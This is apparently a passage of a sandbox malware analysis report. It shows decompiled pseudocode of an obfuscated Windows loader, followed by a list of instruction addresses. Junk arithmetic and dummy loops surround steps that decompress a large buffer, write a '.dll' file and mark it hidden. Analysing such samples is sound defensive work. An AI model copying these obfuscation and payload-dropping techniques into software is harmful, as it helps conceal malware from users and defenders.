                                                					E004FEF0C = _t593 + 0xbd;
                                                					_v72 = E004044B4(0x157a00);
                                                					_v56 = 0;
                                                					while(_v56 < 2) {
                                                						_v56 = _v56 + 1;
                                                						_t984 =  *0x4feec4; // 0x0
                                                						_v104 = _t984;
                                                						if(_v104 != 0) {
                                                							_v104 =  *((intOrPtr*)(_v104 - 4));
                                                						}
                                                						if(_v104 != 0x83) {
                                                							_t985 = E004FEED0; // 0xc3c34ef0
                                                							 *0x4feee8 = _t985;
                                                						} else {
                                                							_t986 =  *0x4fef4c; // 0x43c1493c
                                                							E004FEED0 = _t986;
                                                						}
                                                					}
                                                					_t598 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4fef04 = _t598;
                                                					_v44 = _v60 * _v52;
                                                					_t601 = E004FEF00; // 0xa3b3f6c0
                                                					 *0x4fef14 = _t601;
                                                					_v48 = 0;
                                                					while(_v48 < 3) {
                                                						_v48 = _v48 + 1;
                                                						_t978 =  *0x4fef30; // 0xa1d816
                                                						_t1134 = E004FEF00; // 0xa3b3f6c0
                                                						if(_t978 +  *0x4fef14 >= _t1134 +  *0x4fef30) {
                                                							__eflags = 0x76;
                                                							E004FEF00 = 0x76 - E004FEF38;
                                                						} else {
                                                							_v32 = 0;
                                                							while(_v32 < 6) {
                                                								_v32 = _v32 + 1;
                                                								_t983 =  *0x4fef40; // 0x3c79b5d4
                                                								 *0x4feea0 = _t983;
                                                							}
                                                						}
                                                					}
                                                					_t603 = E004FEF34; // 0xc3c34ef0
                                                					E004FEF38 = _t603 - E004FEF50;
                                                					_push(_t1152);
                                                					_push(0x4f97e9);
                                                					_push( *[fs:eax]);
                                                					 *[fs:eax] = _t1153;
                                                					_v36 = _v32 + 0x96;
                                                					_v40 = 0;
                                                					while(_v40 < 0xd) {
                                                						_v40 = _v40 + 1;
                                                						_v708 = _v60 + 0x4a;
                                                						asm("fild dword [ebp-0x2c0]");
                                                						_v44 = E004048CC();
                                                						_v52 = 0;
                                                						if(_v52 < 0xd) {
                                                							_v52 = _v52 + 1;
                                                							_t976 =  *0x4feeec; // 0xb52124f2
                                                							E004FEF50 = _t976 - E004FEF50;
                                                						}
                                                						_t969 = E004FEF20; // 0x6e687a1a
                                                						E004FEED0 = _t969;
                                                						_t970 =  *0x4feedc; // 0xbc3e19a
                                                						 *0x4feedc = E0040489C(_t970);
                                                						_t972 = E004FEED0; // 0xc3c34ef0
                                                						_t1201 = _t972 -  *0x4feedc; // 0xbc3e19a
                                                						if(_t1201 > 0) {
                                                							_t974 =  *0x4fef30; // 0xa1d816
                                                							 *0x4fef04 = _t974 * E004FEED0;
                                                						}
                                                						asm("fild dword [0x4feefc]");
                                                						E004FEF2C = E004048D8();
                                                						_t1203 = _v40 - 0xd;
                                                					}
                                                					_t609 = E004FEF50; // 0xa3b3f6c0
                                                					 *0x4fef4c = _t609 - 0xc2;
                                                					_t611 = E004FEF0C; // 0xb52124bf
                                                					 *0x4feea0 = _t611;
                                                					_t612 =  *0x4fef28; // 0x3c79b5d4
                                                					_v708 = _t612 + 0xf3;
                                                					asm("fild dword [ebp-0x2c0]");
                                                					 *0x4feee0 = E004048CC();
                                                					_push( &_v56);
                                                					_push( &_v44);
                                                					_push(0x4feef0);
                                                					_t1081 =  &_v60;
                                                					 *0x4feedc = E004F4700(0x4feed8, _t1034,  &_v44, _t1081, _t1203);
                                                					_v76 = 0xd3a74;
                                                					asm("cdq");
                                                					_push(_t1081);
                                                					_push(_v76);
                                                					_t624 = _v64 - 0xbb7;
                                                					if(0 == _v92) {
                                                						_t1205 = _t624 - _v96;
                                                					}
                                                					if(_t1205 == 0) {
                                                						_v60 = 0;
                                                						do {
                                                							E00407678(_v28, 4, 1,  &_v12);
                                                							_t912 =  *0x4fef14; // 0xb52124ca
                                                							 *0x4feed8 = _t912;
                                                							_t913 =  *0x4feefc; // 0x4b08dcc7
                                                							 *0x4feedc = _t913;
                                                							_t914 =  *0x4feedc; // 0xbc3e19a
                                                							_t1207 = _t914 -  *0x4feed8; // 0x1cb9338e
                                                							if(_t1207 > 0) {
                                                								_v40 = _v44 + _v48;
                                                							}
                                                							_v52 = _v56 + 0x3b;
                                                							E00406CF4( &_v20, L"ZwYieldExecution");
                                                							_v60 = _v60 + 1;
                                                						} while (_v60 != 6);
                                                						_t919 = E004FEF34; // 0xc3c34ef0
                                                						E004FEF34 = E0040489C(_t919);
                                                						_t921 = E004FEED0; // 0xc3c34ef0
                                                						_v708 = _t921 + 4;
                                                						asm("fild dword [ebp-0x2c0]");
                                                						 *0x4fef4c = E004048D8();
                                                						_t924 =  *0x4feecc; // 0xd26bafe0
                                                						 *0x4feed8 = _t924 + 0xab;
                                                						_t926 =  *0x4feecc; // 0xd26bafe0
                                                						 *0x4feef4 = _t926 << 4;
                                                						_t928 =  *0x4feee0; // 0x747938b
                                                						E004FEF0C = _t928 - 0xe;
                                                						_v76 = 0;
                                                						do {
                                                							_t1126 =  *0x4fef24; // 0x0
                                                							if(E00407774(L"QueryTraceA", 1, _t1126) >= 0x67) {
                                                								_t934 = _v32 - _v52;
                                                								__eflags = _t934;
                                                								_v40 = _t934;
                                                								E00406CF4( &_v20, _v12);
                                                							} else {
                                                								_v36 = _v48 * _v44;
                                                							}
                                                							_t937 = E004FEF00; // 0xa3b3f6c0
                                                							_v708 = _t937 + 4;
                                                							asm("fild dword [ebp-0x2c0]");
                                                							E004FEF34 = E004048D8();
                                                							E00406CF4( &_v24, _v12);
                                                							E00406CF4( &_v28, L"RegDeleteKeyW");
                                                							_t944 = E004FEF2C; // 0xa1d900
                                                							 *0x4feecc = _t944;
                                                							_t945 =  *0x4feef4; // 0xb52124ca
                                                							 *0x4feed8 = _t945;
                                                							_t946 =  *0x4fefa0; // 0x4fe524
                                                							 *((char*)(_t946 + _v76)) = 0x7a;
                                                							_v76 = _v76 + 1;
                                                						} while (_v76 != 0x20);
                                                						asm("fild dword [ebp-0x34]");
                                                						_v48 = E004048CC();
                                                						_v52 = 0;
                                                						while(_v52 < 7) {
                                                							_v52 = _v52 + 1;
                                                							_v44 = 0;
                                                							while(_v44 < 4) {
                                                								_v44 = _v44 + 1;
                                                								E00407678(_v16, 1, 1,  &_v12);
                                                							}
                                                							_t956 =  *0x4fef30; // 0xa1d816
                                                							 *0x4feedc = _t956;
                                                							_t957 =  *0x4feefc; // 0x4b08dcc7
                                                							 *0x4feee8 = _t957;
                                                						}
                                                						_t949 =  *0x4fef30; // 0xa1d816
                                                						 *0x4feef4 = _t949;
                                                						_t950 = E004FEF10; // 0x1cb931c0
                                                						 *0x4fef18 = _t950 + 4;
                                                						_t952 =  *0x4fef28; // 0x3c79b5d4
                                                						_t953 = _t952 + 0x20;
                                                						_t1217 = _t953;
                                                						 *0x4fef30 = _t953;
                                                						_t954 =  *0x4feedc; // 0xbc3e19a
                                                						 *0x4fef3c = _t954;
                                                					}
                                                					 *0x4feef4 = E004F3F2C( &E004FEF0C,  &_v60,  &E004FEF38, _t1217,  &_v56, 0x4feefc,  &_v52,  &E004FEF2C);
                                                					_v36 = 0x95 - _v56;
                                                					_v40 = 0;
                                                					_t1218 = _v40 - 3;
                                                					if(_v40 < 3) {
                                                						_v40 = _v40 + 1;
                                                						_v44 = _v32 - 0xa;
                                                					}
                                                					asm("fild dword [0x4fef2c]");
                                                					 *0x4fef3c = E004048CC();
                                                					_t1044 =  *0x4fef48; // 0xc3c34ef0
                                                					_t1085 =  *0x4fef40; // 0x3c79b5d4
                                                					 *0x4fef40 = E004F5234(_v44, _t1044, _t1085, _t1218);
                                                					_t1086 = E004FEF00; // 0xa3b3f6c0
                                                					 *0x4fef3c = E004F827C(_v44, _t1086);
                                                					E00404658(0x41a22c, _t1034, _v76, _v68);
                                                					_v40 = _v56 + 4;
                                                					_v44 = 0;
                                                					while(_v44 < 4) {
                                                						_v44 = _v44 + 1;
                                                						asm("fild dword [0x4fef34]");
                                                						 *0x4fef30 = E004048D8();
                                                						_t1220 = _v44 - 4;
                                                					}
                                                					_t642 =  *0x4feecc; // 0xd26bafe0
                                                					 *0x4fef40 = _t642;
                                                					_push(_v52);
                                                					_t1046 =  *0x4fef44; // 0x38993
                                                					_t644 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4fef48 = E004EE798(_t644, _t1034, _t1046, _v32, _t1220);
                                                					_t646 =  *0x4fef30; // 0xa1d816
                                                					E004FEED0 = _t646 + 0x6e;
                                                					_t648 = E004FEF2C; // 0xa1d900
                                                					 *0x4feef0 = _t648 - 0xd2;
                                                					_t652 = E004F0FBC( &_v704, _t1034,  &_v72, _v68, _t1149, _t1150,  &_v76); // executed
                                                					if(_t652 != 0) {
                                                						_t701 =  *0x4fef4c; // 0x43c1493c
                                                						E004FEF38 = _t701;
                                                						_t702 =  *0x4fef3c; // 0x1cb932a9
                                                						 *0x4fef3c = E0040489C(_t702);
                                                						_t704 = E004FEF38; // 0xc3c34fdc
                                                						_t1222 = _t704 -  *0x4fef3c; // 0x1cb932a9
                                                						if(_t1222 >= 0) {
                                                							_t705 =  *0x4feef4; // 0xb52124ca
                                                							_t706 = _t705 + 4;
                                                							__eflags = _t706;
                                                							 *0x4feea0 = _t706;
                                                						} else {
                                                							_v60 = 0;
                                                							do {
                                                								_t899 = E004FEF20; // 0x6e687a1a
                                                								 *0x4feecc = _t899;
                                                								_v60 = _v60 + 1;
                                                							} while (_v60 != 2);
                                                							_v36 = _v32 * _v56;
                                                							_v40 = 0;
                                                							while(_v40 < 6) {
                                                								_v40 = _v40 + 1;
                                                								_t903 =  *0x4fef14; // 0xb52124ca
                                                								E004FEF20 = _t903 + 0x91;
                                                							}
                                                						}
                                                						_t707 =  *0x4fef48; // 0xc3c34ef0
                                                						_t1227 = _t707 +  *0x4feedc -  *0x4feedc; // 0xbc3e19a
                                                						if(_t1227 != 0) {
                                                							_t709 = E004FEF34; // 0xc3c34ef0
                                                							_t710 = _t709 +  *0x4feefc;
                                                							__eflags = _t710;
                                                							E004FEF2C = _t710;
                                                							E004FEF00 = E004F0EBC( &E004FEF38,  &E004FEF20, __eflags);
                                                						} else {
                                                							asm("fild dword [0x4feeec]");
                                                							E004FEF00 = E004048CC();
                                                						}
                                                						_t713 =  *0x4fef44; // 0x38993
                                                						 *0x4feea0 = _t713 -  *0x4feed8;
                                                						_t715 =  *0x4fef40; // 0x3c79b5d4
                                                						 *0x4feee0 = _t715 + 0xe7;
                                                						_t717 =  *0x4fef3c; // 0x1cb932a9
                                                						E004FEF00 = _t717 - 0x4c;
                                                						_push( &_v32);
                                                						_push( &E004FEF10);
                                                						_push( &_v36);
                                                						E004FEF0C = E004F4700(0x4fef40, _t1034,  &_v36,  &_v32, _t1227);
                                                						if(RtlDecompressBuffer(2, _v68, 0x157a00, _v72, _v76,  &_v64) == 0) {
                                                							_v32 = _v60 * _v52;
                                                							_v36 = _v44 - 0x8d;
                                                							_t747 =  *0x4fef40; // 0x3c79b5d4
                                                							E004FEF10 = _t747 -  *0x4feee0;
                                                							_t749 =  *0x4fef40; // 0x3c79b5d4
                                                							_v708 = _t749 + 0xa5;
                                                							asm("fild dword [ebp-0x2c0]");
                                                							E004FEF2C = E004048CC();
                                                							_t752 = E004FEF38; // 0xc3c34fdc
                                                							E004FEF38 = E0040489C(_t752);
                                                							_t754 =  *0x4feedc; // 0xbc3e19a
                                                							 *0x4fef3c = _t754;
                                                							_t755 = E004FEF38; // 0xc3c34fdc
                                                							_t1229 = _t755 -  *0x4fef3c; // 0x1cb932a9
                                                							if(_t1229 >= 0) {
                                                								_t756 =  *0x4fef30; // 0xa1d816
                                                								 *0x4fef3c = _t756;
                                                								_t757 =  *0x4fef3c; // 0x1cb932a9
                                                								__eflags = _t757 -  *0x4fef3c; // 0x1cb932a9
                                                								if(__eflags >= 0) {
                                                									E00406CF4( &_v12, _v16);
                                                								} else {
                                                									_t886 = E004FEF50; // 0xa3b3f6c0
                                                									E004FEF50 = E0040489C(_t886);
                                                									_t888 =  *0x4fef3c; // 0x1cb932a9
                                                									__eflags = _t888 - E004FEF50; // 0xa3b3f6c0
                                                									if(__eflags <= 0) {
                                                										_t889 =  *0x4feed8; // 0x1cb9338e
                                                										E004FEF2C = _t889 - 0xc3;
                                                									} else {
                                                										_t891 =  *0x4feedc; // 0xbc3e19a
                                                										 *0x4feef0 = _t891 -  *0x4fef28;
                                                									}
                                                								}
                                                							} else {
                                                								if(E00407774(L"logscrpt.dll", 1, _v28) == 0x33) {
                                                									asm("fild dword [0x4feee8]");
                                                									 *0x4fef14 = E004048D8();
                                                								} else {
                                                									 *0x4feee8 =  *0x4fef4c * 0x6c;
                                                								}
                                                							}
                                                							_t760 =  *0x4feea0; // 0xa1d900
                                                							E004FEF00 = _t760 - 0x55;
                                                							E00404814(0,  &_v720, _t1152);
                                                							E00407414( &_v716, _v720);
                                                							E004F37A4(_v716, _t1034,  &_v712, _t1149, _t1150); // executed
                                                							E004070C8( &_v712, L".dll");
                                                							E00407400( &_v96, _v712);
                                                							_v60 = 0;
                                                							do {
                                                								E00406CF4( &_v12, L"D3DCompiler_47.dll");
                                                								_v60 = _v60 + 1;
                                                							} while (_v60 != 0x10);
                                                							_v36 = 0;
                                                							do {
                                                								_v40 = _v44 + 0xa2;
                                                								_v708 = _v48 + 4;
                                                								asm("fild dword [ebp-0x2c0]");
                                                								_v52 = E004048D8();
                                                								_v36 = _v36 + 1;
                                                								_t1234 = _v36 - 0xd;
                                                							} while (_v36 != 0xd);
                                                							_t781 =  *0x4fef44; // 0x38993
                                                							E004FEF34 = _t781 + 0x14;
                                                							 *0x4fef14 = E004F6738();
                                                							_t784 =  *0x4feee0; // 0x747938b
                                                							 *0x4fef40 = _t784;
                                                							_t785 =  *0x4feef4; // 0xb52124ca
                                                							 *0x4feea0 = _t785 + 0xab;
                                                							E004F7D2C(_v68, _t1034, _v64, _t1149, _t1150); // executed
                                                							_v44 = _v60 + 0x40;
                                                							E00406CF4( &_v20, L"vpnikeapi.dll");
                                                							_v52 = _v56 * 0xb;
                                                							_t794 =  *0x4feeec; // 0xb52124f2
                                                							E004FEF38 = _t794;
                                                							_t795 = E004FEED0; // 0xc3c34ef0
                                                							 *0x4fef3c = _t795;
                                                							_t796 =  *0x4fef44; // 0x38993
                                                							_v708 = _t796 + 4;
                                                							asm("fild dword [ebp-0x2c0]");
                                                							 *0x4feea0 = E004048D8();
                                                							E00407414( &_v724, _v96);
                                                							_t802 = E004F684C(_v724, _t1034, _v64, _v68, _t1234); // executed
                                                							if(_t802 != 0) {
                                                								_v48 = _v36 + 0xcf;
                                                								_t822 =  *0x4fef3c; // 0x1cb932a9
                                                								 *0x4fef18 = _t822;
                                                								_v44 = _v32 - _v40;
                                                								_t825 =  *0x4feed8; // 0x1cb9338e
                                                								_v708 = _t825 + 4;
                                                								asm("fild dword [ebp-0x2c0]");
                                                								 *0x4fef44 = E004048D8();
                                                								_t828 =  *0x4fef44; // 0x38993
                                                								_t829 = _t828 * E004FEED0;
                                                								E004FEED0 = _t829;
                                                								_t830 =  *0x4fef18; // 0xbc3e19a
                                                								 *0x4feee0 = _t830;
                                                								SetFileAttributesW(E00407330(_v96), 2); // executed
                                                								asm("fild dword [ebp-0x1c]");
                                                								_v48 = E004048CC();
                                                								E00407640(_v24, _v12);
                                                								if(_t829 != 0) {
                                                									E004FEF10 = 0xb0 - E004FEF50;
                                                									_t839 =  *0x4fef4c; // 0x43c1493c
                                                									_t840 = _t839 << 2;
                                                									__eflags = _t840;
                                                									E004FEF2C = _t840 + _t840 * 4;
                                                								} else {
                                                									_t872 = E004FEF34; // 0xc3c34ef0
                                                									_t1237 = _t872 + 0x30 - E004FEF10; // 0x1cb931c0
                                                									if(_t1237 >= 0) {
                                                										asm("fild dword [ebp-0x30]");
                                                										_v36 = E004048CC();
                                                									} else {
                                                										_v56 = 0;
                                                										while(_v56 < 0xd) {
                                                											_v56 = _v56 + 1;
                                                											 *0x4fef28 = E004F5038( &E004FEF00,  &E004FEF50, 0x4fef04,  &E004FEED0,  &E004FEF38);
                                                										}
                                                										_t882 =  *0x4feef0; // 0x44632301
                                                										 *0x4feef0 = E0040489C(_t882);
                                                									}
                                                									_t875 = E004FEF00; // 0xa3b3f6c0
                                                									 *0x4fef44 = _t875 + 0xb6;
                                                									_t877 =  *0x4fef44; // 0x38993
                                                									 *0x4fef4c = _t877;
                                                									_t878 =  *0x4fef40; // 0x3c79b5d4
                                                									_v708 = _t878 + 0x4d;
                                                									asm("fild dword [ebp-0x2c0]");
                                                									 *0x4feedc = E004048CC();
                                                								}
                                                								E004FEF50 =  *0x4fef04 * 0xab;
                                                								_t843 = E004FEF00; // 0xa3b3f6c0
                                                								 *0x4feedc = _t843 +  *0x4feefc;
                                                								_t845 =  *0x4feee8; // 0xdcd0f434
                                                								 *0x4feee8 = E0040489C(_t845);
                                                								_t847 =  *0x4feecc; // 0xd26bafe0
                                                								E004FEF00 = _t847 << 6;
                                                								E00404814(0,  &_v756, _t1152);
                                                								E00407414( &_v752, _v756);
                                                								E004F37A4(_v752, _t1034,  &_v748, _t1149, _t1150); // executed
                                                								E0040713C( &_v744, _v748, 0x4f9bcc);
                                                								_push(_v744);
                                                								E00407414( &_v760, _v96);
                                                								_pop(_t1119); // executed
                                                								E004F4848(_v760, _t1034,  &_v740, _t1119, _t1149, _t1150, _t1261);
                                                								_t862 =  *0x4feed8; // 0x1cb9338e
                                                								 *0x4feed8 = _t862;
                                                								_v36 = _v56 - _v52;
                                                								_v40 = _v44 + _v32;
                                                								_t867 =  *0x4fef48; // 0xc3c34ef0
                                                								 *0x4fef14 = _t867 * E004FEF00;
                                                								E004FEF34 = 0xff -  *0x4fef44;
                                                								 *0x4fef48 =  *0x4fef40 * 0x64;
                                                							}
                                                							_v708 = _v60 + 4;
                                                							asm("fild dword [ebp-0x2c0]");
                                                							_v40 = E004048D8();
                                                							_v44 = 0;
                                                							if(_v44 < 4) {
                                                								do {
                                                									_v44 = _v44 + 1;
                                                									_v48 = _v52 + _v32;
                                                									_t1242 = _v44 - 4;
                                                								} while (_t1242 < 0);
                                                							}
                                                							_t807 =  *0x4fef04; // 0x43c14963
                                                							E004FEF34 = _t807;
                                                							_t808 =  *0x4fef08; // 0x0
                                                							_t1111 =  *0x4feea8; // 0x0
                                                							E00407640(_t808, _t1111);
                                                							if(_t1242 == 0) {
                                                								_v56 = 0;
                                                								_t1243 = _v56;
                                                								if(_v56 < 0) {
                                                									_v56 = _v56 + 1;
                                                									_push( &_v60);
                                                									_push(0x4feed8);
                                                									_push( &_v60);
                                                									 *0x4feedc = E004F4700(0x4fef28, _t1034,  &E004FEF0C,  &_v52, _t1243);
                                                								}
                                                							}
                                                							E004FEF10 = 0xba -  *0x4feedc;
                                                							_t812 =  *0x4feedc * 0x1e;
                                                							_t1244 = _t812;
                                                							 *0x4fef30 = _t812;
                                                						}
                                                						_t1098 =  *0x4feea0; // 0xa1d900
                                                						_t728 =  *0x4feef0; // 0x44632301
                                                						 *0x4feee8 = E004F5234(_t728, _v52, _t1098, _t1244);
                                                						_v36 = _v40 + 0xe5;
                                                						_v52 = _v48 - _v60;
                                                						_t734 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4fef04 = _t734;
                                                						if(_v44 - _v36 < 0x84) {
                                                							 *0x4fef30 =  *0x4fef30 - 0xe1;
                                                						}
                                                						_v44 = 0;
                                                						do {
                                                							_t738 =  *0x4feebc; // 0x0
                                                							_v108 = _t738;
                                                							if(_v108 != 0) {
                                                								_v108 =  *((intOrPtr*)(_v108 - 4));
                                                							}
                                                							if(_v108 == 0xf0) {
                                                								_t739 =  *0x4fef3c; // 0x1cb932a9
                                                								 *0x4feecc = _t739;
                                                							}
                                                							_v44 = _v44 + 1;
                                                						} while (_v44 != 7);
                                                					}
                                                					_pop(_t1090);
                                                					 *[fs:eax] = _t1090;
                                                					_push(E004F97F3);
                                                					_v52 = _v44 + 0x82;
                                                					if(_v52 + 0xdd >= _v32) {
                                                						E00406CF4( &_v28, L"shmig.dll");
                                                					} else {
                                                						_v56 = 0;
                                                						while(_v56 < 9) {
                                                							_v56 = _v56 + 1;
                                                							_t696 =  *0x4fef30; // 0xa1d816
                                                							E004FEF50 = _t696;
                                                							_t697 =  *0x4feefc; // 0x4b08dcc7
                                                							 *0x4feecc = _t697;
                                                							_t698 =  *0x4feecc; // 0xd26bafe0
                                                							_t1254 = _t698 - E004FEF50; // 0xa3b3f6c0
                                                							if(_t1254 > 0) {
                                                								_v36 = _v40 + _v60;
                                                							}
                                                						}
                                                						E00407678(_v28, 4, 1,  &_v20);
                                                						_t693 =  *0x4fef3c; // 0x1cb932a9
                                                						_v708 = _t693 + 4;
                                                						asm("fild dword [ebp-0x2c0]");
                                                						 *0x4fef30 = E004048D8();
                                                					}
                                                					E00407678(_v24, 3, 1,  &_v12);
                                                					_t663 =  *0x4feed8; // 0x1cb9338e
                                                					 *0x4feed8 = E0040489C(_t663);
                                                					_t665 =  *0x4feed8; // 0x1cb9338e
                                                					_t1257 = _t665 - E004FEF50; // 0xa3b3f6c0
                                                					if(_t1257 > 0) {
                                                						_t687 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4feefc = _t687 - 0xc5;
                                                					}
                                                					asm("fild dword [0x4feea0]");
                                                					E004FEF20 = E004048D8();
                                                					_t667 =  *0x4feea0; // 0xa1d900
                                                					E004FEF38 = _t667 *  *0x4feefc;
                                                					E004044D0(_v68);
                                                					_v36 = _v48 - 0xeb;
                                                					E00407678(_v16, 1, 1,  &_v16);
                                                					_v60 = _v52 - 0x1c;
                                                					_t678 = E004FEF34; // 0xc3c34ef0
                                                					 *0x4fef18 = _t678 + 0xec;
                                                					_t680 =  *0x4fef48; // 0xc3c34ef0
                                                					 *0x4fef30 = _t680 - 0xea;
                                                					_t682 =  *0x4fef18; // 0xbc3e19a
                                                					E004FEF38 = _t682;
                                                					_t683 = E004FEF00; // 0xa3b3f6c0
                                                					 *0x4fef3c = _t683;
                                                					_t684 = E004FEF38; // 0xc3c34fdc
                                                					_t1259 = _t684 -  *0x4fef3c; // 0x1cb932a9
                                                					if(_t1259 < 0) {
                                                						_t685 =  *0x4feee0; // 0x747938b
                                                						_t686 = _t685 - 0xe7;
                                                						 *0x4feecc = _t686;
                                                						return _t686;
                                                					}
                                                					return _t684;
                                                				}
                                                			}
                                                0x004f8a02
                                                0x004f89e8
                                                0x004f89e8
                                                0x004f89f3
                                                0x004f89f3
                                                0x004f8a07
                                                0x004f8a0f
                                                0x004f8a15
                                                0x004f8a20
                                                0x004f8a25
                                                0x004f8a2f
                                                0x004f8a3e
                                                0x004f8a43
                                                0x004f8a4a
                                                0x004f8a4c
                                                0x004f8a4f
                                                0x004f8a54
                                                0x004f8a5b
                                                0x004f8a65
                                                0x004f8a65
                                                0x004f8a6f
                                                0x004f8a7d
                                                0x004f8a82
                                                0x004f8a71
                                                0x004f8a71
                                                0x004f8a76
                                                0x004f8a76
                                                0x004f8a87
                                                0x004f8a8d
                                                0x004f8a92
                                                0x004f8a9d
                                                0x004f8aa0
                                                0x004f8aa5
                                                0x004f8aac
                                                0x004f8ab3
                                                0x004f8ab5
                                                0x004f8ab8
                                                0x004f8ac3
                                                0x004f8ad1
                                                0x004f8af8
                                                0x004f8afe
                                                0x004f8ad3
                                                0x004f8ad5
                                                0x004f8adc
                                                0x004f8ade
                                                0x004f8ae1
                                                0x004f8ae6
                                                0x004f8aeb
                                                0x004f8adc
                                                0x004f8b03
                                                0x004f8b09
                                                0x004f8b14
                                                0x004f8b1b
                                                0x004f8b1c
                                                0x004f8b21
                                                0x004f8b24
                                                0x004f8b2f
                                                0x004f8b34
                                                0x004f8b3b
                                                0x004f8b41
                                                0x004f8b4a
                                                0x004f8b50
                                                0x004f8b5b
                                                0x004f8b60
                                                0x004f8b67
                                                0x004f8b69
                                                0x004f8b6c
                                                0x004f8b77
                                                0x004f8b77
                                                0x004f8b84
                                                0x004f8b89
                                                0x004f8b8e
                                                0x004f8b98
                                                0x004f8b9d
                                                0x004f8ba2
                                                0x004f8ba8
                                                0x004f8baa
                                                0x004f8bb5
                                                0x004f8bb5
                                                0x004f8bba
                                                0x004f8bc5
                                                0x004f8bca
                                                0x004f8bca
                                                0x004f8bd4
                                                0x004f8bde
                                                0x004f8be3
                                                0x004f8be8
                                                0x004f8bed
                                                0x004f8bf7
                                                0x004f8bfd
                                                0x004f8c08
                                                0x004f8c10
                                                0x004f8c14
                                                0x004f8c15
                                                0x004f8c1d
                                                0x004f8c2a
                                                0x004f8c3d
                                                0x004f8c43
                                                0x004f8c44
                                                0x004f8c45
                                                0x004f8c49
                                                0x004f8c54
                                                0x004f8c56
                                                0x004f8c56
                                                0x004f8c5b
                                                0x004f8c63
                                                0x004f8c66
                                                0x004f8c77
                                                0x004f8c7c
                                                0x004f8c81
                                                0x004f8c86
                                                0x004f8c8b
                                                0x004f8c90
                                                0x004f8c95
                                                0x004f8c9b
                                                0x004f8ca3
                                                0x004f8ca3
                                                0x004f8cac
                                                0x004f8cb7
                                                0x004f8cbc
                                                0x004f8cbf
                                                0x004f8cc5
                                                0x004f8ccf
                                                0x004f8cd4
                                                0x004f8cdc
                                                0x004f8ce2
                                                0x004f8ced
                                                0x004f8cf2
                                                0x004f8cfc
                                                0x004f8d01
                                                0x004f8d09
                                                0x004f8d0e
                                                0x004f8d16
                                                0x004f8d1d
                                                0x004f8d20
                                                0x004f8d25
                                                0x004f8d38
                                                0x004f8d48
                                                0x004f8d48
                                                0x004f8d4b
                                                0x004f8d54
                                                0x004f8d3a
                                                0x004f8d40
                                                0x004f8d40
                                                0x004f8d59
                                                0x004f8d61
                                                0x004f8d67
                                                0x004f8d72
                                                0x004f8d7d
                                                0x004f8d8a
                                                0x004f8d8f
                                                0x004f8d94
                                                0x004f8d99
                                                0x004f8d9e
                                                0x004f8da3
                                                0x004f8dab
                                                0x004f8daf
                                                0x004f8db2
                                                0x004f8dbc
                                                0x004f8dc4
                                                0x004f8dc9
                                                0x004f8dd0
                                                0x004f8dd2
                                                0x004f8dd7
                                                0x004f8dde
                                                0x004f8de0
                                                0x004f8df4
                                                0x004f8df9
                                                0x004f8dff
                                                0x004f8e04
                                                0x004f8e09
                                                0x004f8e0e
                                                0x004f8e13
                                                0x004f8e19
                                                0x004f8e1e
                                                0x004f8e23
                                                0x004f8e2b
                                                0x004f8e30
                                                0x004f8e35
                                                0x004f8e35
                                                0x004f8e38
                                                0x004f8e3d
                                                0x004f8e42
                                                0x004f8e42
                                                0x004f8e6b
                                                0x004f8e78
                                                0x004f8e7d
                                                0x004f8e80
                                                0x004f8e84
                                                0x004f8e86
                                                0x004f8e8f
                                                0x004f8e8f
                                                0x004f8e9a
                                                0x004f8ea5
                                                0x004f8eaa
                                                0x004f8eb0
                                                0x004f8ebe
                                                0x004f8ec3
                                                0x004f8ed1
                                                0x004f8ee1
                                                0x004f8eec
                                                0x004f8ef1
                                                0x004f8ef8
                                                0x004f8efa
                                                0x004f8efd
                                                0x004f8f08
                                                0x004f8f0d
                                                0x004f8f0d
                                                0x004f8f13
                                                0x004f8f18
                                                0x004f8f20
                                                0x004f8f21
                                                0x004f8f2a
                                                0x004f8f34
                                                0x004f8f39
                                                0x004f8f41
                                                0x004f8f46
                                                0x004f8f50
                                                0x004f8f65
                                                0x004f8f6c
                                                0x004f8f72
                                                0x004f8f77
                                                0x004f8f7c
                                                0x004f8f86
                                                0x004f8f8b
                                                0x004f8f90
                                                0x004f8f96
                                                0x004f8fde
                                                0x004f8fe3
                                                0x004f8fe3
                                                0x004f8fe6
                                                0x004f8f98
                                                0x004f8f9a
                                                0x004f8f9d
                                                0x004f8f9d
                                                0x004f8fa2
                                                0x004f8fa7
                                                0x004f8faa
                                                0x004f8fb6
                                                0x004f8fbb
                                                0x004f8fc2
                                                0x004f8fc4
                                                0x004f8fc7
                                                0x004f8fd1
                                                0x004f8fd6
                                                0x004f8fc2
                                                0x004f8feb
                                                0x004f8ff6
                                                0x004f8ffc
                                                0x004f9010
                                                0x004f9015
                                                0x004f9015
                                                0x004f901b
                                                0x004f902f
                                                0x004f8ffe
                                                0x004f8ffe
                                                0x004f9009
                                                0x004f9009
                                                0x004f9034
                                                0x004f903f
                                                0x004f9044
                                                0x004f904e
                                                0x004f9053
                                                0x004f905b
                                                0x004f9063
                                                0x004f9064
                                                0x004f906c
                                                0x004f907d
                                                0x004f90a1
                                                0x004f90ad
                                                0x004f90b8
                                                0x004f90bb
                                                0x004f90c6
                                                0x004f90cb
                                                0x004f90d5
                                                0x004f90db
                                                0x004f90e6
                                                0x004f90eb
                                                0x004f90f5
                                                0x004f90fa
                                                0x004f90ff
                                                0x004f9104
                                                0x004f9109
                                                0x004f910f
                                                0x004f9148
                                                0x004f914d
                                                0x004f9152
                                                0x004f9157
                                                0x004f915d
                                                0x004f91a4
                                                0x004f915f
                                                0x004f915f
                                                0x004f9169
                                                0x004f916e
                                                0x004f9173
                                                0x004f9179
                                                0x004f918d
                                                0x004f9197
                                                0x004f917b
                                                0x004f917b
                                                0x004f9186
                                                0x004f9186
                                                0x004f9179
                                                0x004f9111
                                                0x004f9126
                                                0x004f9136
                                                0x004f9141
                                                0x004f9128
                                                0x004f912f
                                                0x004f912f
                                                0x004f9126
                                                0x004f91a9
                                                0x004f91b1
                                                0x004f91be
                                                0x004f91cf
                                                0x004f91e0
                                                0x004f91f0
                                                0x004f91fe
                                                0x004f9205
                                                0x004f9208
                                                0x004f9210
                                                0x004f9215
                                                0x004f9218
                                                0x004f9220
                                                0x004f9223
                                                0x004f922b
                                                0x004f9234
                                                0x004f923a
                                                0x004f9245
                                                0x004f9248
                                                0x004f924b
                                                0x004f924b
                                                0x004f9251
                                                0x004f9259
                                                0x004f9263
